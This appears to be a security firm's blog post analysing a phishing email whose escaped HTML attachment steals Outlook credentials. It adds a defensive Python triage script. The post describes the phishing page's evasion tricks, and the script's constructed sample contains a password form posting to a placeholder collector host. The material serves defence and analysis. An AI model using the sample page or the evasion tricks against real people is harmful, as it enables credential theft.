Active Threat Investigations – June 2021

Active Threat – Credential Stealing Email Located

We recently had a phishing investigation into an email with an HTML attachment that caught our eye. It caught our eye because Microsoft had just recently posted about an ongoing attack from NOBELIUM whose delivery technique resembled the one in this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO which drops an LNK file that executes the Cobalt Strike Beacon loader. There’s more to that chain than this, but luckily the HTML smuggling step is where this attack’s path diverged from it.

After we obtained the email from the client, we were able to dig into what was going on inside of the HTML attachment. The HTML was ‘obfuscated’; well, when I say obfuscated, I really mean the characters in the document had been “escaped”, the kind of encoding that is common in web requests. Recovering the plaintext of the document was trivial, and we then started to dig deeper into its functionality.

There were quite a few interesting things to note in this phishing campaign. The adversary worked hard to avoid alerting the user that their credentials were in fact being stolen. If a user reloaded the page more than 3 times, the document would say “Scanned File Locked! Redirecting you back to your account” and would then take them back to Outlook. It also prompted the user for their password twice, telling them it was wrong each time (this is smart because many people mistype their password the first time); on the third attempt it would say “Scanned File Locked” and redirect them back to their Outlook page. The JavaScript on the page also dynamically pulled the company’s logo from a website called Statvoo.com, keyed on the domain name of the targeted user, to make the attack even more convincing. The website that the credentials are sent to was created 5-19-2021 and is hosting a default WordPress page with no content on it. We’ve since reported the site to the hosting provider and are waiting for it to be taken down.
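As an added example (not code from the original post or from the investigation team), the Python helper below reverses the kind of escaping described above and pulls out the indicators an analyst looks for when triaging an attachment like this one: where the form posts the credentials, whether the page asks for a password, and which external hosts (for instance a logo lookup service) it references. The sample attachment, the hostnames and the assumption that the escaping is done with JavaScript’s unescape() are all constructed for the example; the post does not show the real attachment’s exact encoding.

```python
import re
import urllib.parse
from html.parser import HTMLParser

# Matches JavaScript unescape('...') / unescape("...") calls and captures the
# percent-encoded payload between the quotes.
_UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)


def js_unescape(text):
    """Mimic JavaScript's unescape(): decode %uXXXX sequences first, then %XX."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def decode_layers(html, max_depth=5):
    """Return every payload hidden behind unescape('...') in the document,
    recursing into each decoded layer in case it has been escaped again."""
    layers, frontier = [], [html]
    for _ in range(max_depth):
        nxt = []
        for doc in frontier:
            for m in _UNESCAPE_CALL.finditer(doc):
                decoded = js_unescape(m.group(2))
                layers.append(decoded)
                nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


class _Indicators(HTMLParser):
    """Collect form targets, password inputs and every referenced host."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.password_fields, self.hosts = [], 0, set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        for key in ("src", "href", "action"):
            host = urllib.parse.urlsplit(a.get(key) or "").hostname
            if host:
                self.hosts.add(host)


def triage(html):
    """Decode the attachment and summarise credential-theft indicators."""
    form_actions, password_fields, hosts = [], 0, set()
    # Parse the outer document and each decoded layer separately: HTMLParser
    # treats <script> bodies as opaque text, so tags written via
    # document.write() would otherwise never be seen.
    for doc in [html] + decode_layers(html):
        parser = _Indicators()
        parser.feed(doc)
        form_actions.extend(parser.form_actions)
        password_fields += parser.password_fields
        hosts |= parser.hosts
    report = {
        "uses_unescape": bool(_UNESCAPE_CALL.search(html)),
        "form_actions": form_actions,
        "password_fields": password_fields,
        "external_hosts": sorted(hosts),
    }
    suspicious = report["uses_unescape"] and password_fields > 0 and form_actions
    report["verdict"] = "credential-harvest-suspect" if suspicious else "needs-review"
    return report


# Constructed sample attachment (not the one from the investigation): the
# visible page is a single script that document.write()s an escaped blob.
# All hostnames are placeholders.
_INNER_PAGE = (
    '<form id="login" method="post" action="https://collector.example.invalid/post.php">'
    '<input type="email" name="user"><input type="password" name="pass"></form>'
    '<img src="https://logo-service.example.invalid/icon/victim.example">'
)
SAMPLE_ATTACHMENT = (
    "<html><body><script>document.write(unescape('"
    + urllib.parse.quote(_INNER_PAGE, safe="")
    + "'))</script></body></html>"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

Running the file prints the decoded indicators for the constructed sample; pointing triage() at a real attachment’s text gives the form action URL (the site to report to the hosting provider) and the referenced hosts without ever executing the page’s JavaScript.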

We did not find any evidence of malware or dropper functionality inside the HTML file, so our best recommendation was to change the affected user’s passwords.
